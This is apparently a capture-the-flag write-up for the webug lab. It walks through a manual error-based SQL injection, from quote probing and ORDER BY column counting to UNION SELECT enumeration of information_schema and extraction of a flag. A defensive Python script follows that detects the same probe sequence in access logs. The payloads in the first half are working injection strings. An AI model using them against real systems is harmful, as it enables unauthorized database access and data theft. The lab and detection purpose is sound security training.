Error-revealing manual injection - Figure 1
Append a single quote and then a double quote to the id value.
With the double quote the page displays normally.
With the single quote the page errors, and the error message leaks the SQL query.

The underlying query is:
SELECT * FROM sqlinjection WHERE id = '1'

Use ORDER BY to determine the number of columns.

The query becomes:
SELECT * FROM sqlinjection WHERE id = '1' order by 3'

Note the trailing single quote left over from the original query: a comment sequence is needed to neutralise it.
The query becomes:
SELECT * FROM sqlinjection WHERE id = '1' order by 3--+
Error-revealing manual injection - Figure 2
SELECT * FROM sqlinjection WHERE id = '1' order by 2--+
Error-revealing manual injection - Figure 3
ORDER BY 2 displays normally and ORDER BY 3 errors, so the column count is 2.

Use a UNION query to find which column is echoed back to the page.

The query becomes:
SELECT * FROM sqlinjection WHERE id = '1' union select 1,2--+
Error-revealing manual injection - Figure 4
The echoed column is column 2,
so every following query takes the form:
SELECT * FROM sqlinjection WHERE id='1' union select 1,<SQL expression to execute>--+

Query the name of the database the site is using

SELECT * FROM sqlinjection WHERE id='1' union select 1,database()--+
Error-revealing manual injection - Figure 5

Query the table names in the database

(select group_concat(table_name) from information_schema.tables where table_schema='<database name>')

SELECT * FROM sqlinjection WHERE id='1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='webug')--+
The table names in the database are:
data_crud
env_list
env_path
flag
Sqlinjection
user
user_test

Query the columns of a table in the database

Error-revealing manual injection - Figure 6
(select group_concat(column_name) from information_schema.columns where table_schema='<database name>' and table_name='<table name>')

SELECT * FROM sqlinjection WHERE id='1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='webug' and table_name='flag')--+

Query the values in a column

Error-revealing manual injection - Figure 7
<column name> from <table name>
SELECT * FROM sqlinjection WHERE id='1' union select 1,flag from flag--+

Flag=dfafdasfafdsadfa
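Seen from the defender's side, the walkthrough above is a fixed sequence of probes that stands out in a web server access log: the quote test, the ORDER BY column count, the UNION SELECT position test and the information_schema enumeration. The following script is an added example (not part of the original write-up) that scans Common Log Format lines for that sequence and groups the hits per client; the log lines, the /sqli.php path and the IP addresses are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit
# Constructed sample access-log lines (not real traffic) replaying the
# walkthrough: quote probe, ORDER BY count, UNION SELECT test, enumeration.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli.php?id=1%22 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli.php?id=1%27 HTTP/1.1" 500 231
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /sqli.php?id=1%27+order+by+3--+ HTTP/1.1" 500 231
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /sqli.php?id=1%27+order+by+2--+ HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /sqli.php?id=1%27+union+select+1,2--+ HTTP/1.1" 200 540
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /sqli.php?id=1%27+union+select+1,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=%27webug%27)--+ HTTP/1.1" 200 700
10.0.0.9 - - [01/Jan/2024:10:00:08 +0000] "GET /sqli.php?id=42 HTTP/1.1" 200 512
"""
# Common Log Format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})')
# One pattern per stage of the manual injection sequence, matched on the
# URL-decoded parameter value (parse_qs decodes %27 and turns '+' into spaces).
STAGES = [
    ("quote_probe", re.compile(r"""^\d+['"]$""")),
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_probe", re.compile(r"\bunion\s+select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
]
def classify_value(value: str) -> list[str]:
    """Return the stage names whose pattern appears in one decoded parameter value."""
    return [name for name, rx in STAGES if rx.search(value)]
def scan_log(text: str) -> dict[str, dict]:
    """Per client IP: stages observed, number of flagged requests and how many returned 5xx."""
    report: dict[str, dict] = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        stages = set()
        for values in parse_qs(urlsplit(m["path"]).query).values():
            for v in values:
                stages.update(classify_value(v))
        if not stages:
            continue  # benign request, e.g. id=42
        entry = report.setdefault(m["ip"], {"stages": set(), "requests": 0, "errors": 0})
        entry["stages"] |= stages
        entry["requests"] += 1
        entry["errors"] += int(m["status"].startswith("5"))  # error-revealing responses
    return report

def suspicious_clients(report: dict[str, dict], min_stages: int = 3) -> list[str]:
    """IPs that walked at least min_stages distinct stages: a hand-driven probe, not a one-off hit."""
    return sorted(ip for ip, e in report.items() if len(e["stages"]) >= min_stages)
```

Run against the constructed log, the scan reports one client that passed through all four stages with two 5xx responses, which is exactly the footprint the quote and ORDER BY steps above leave behind.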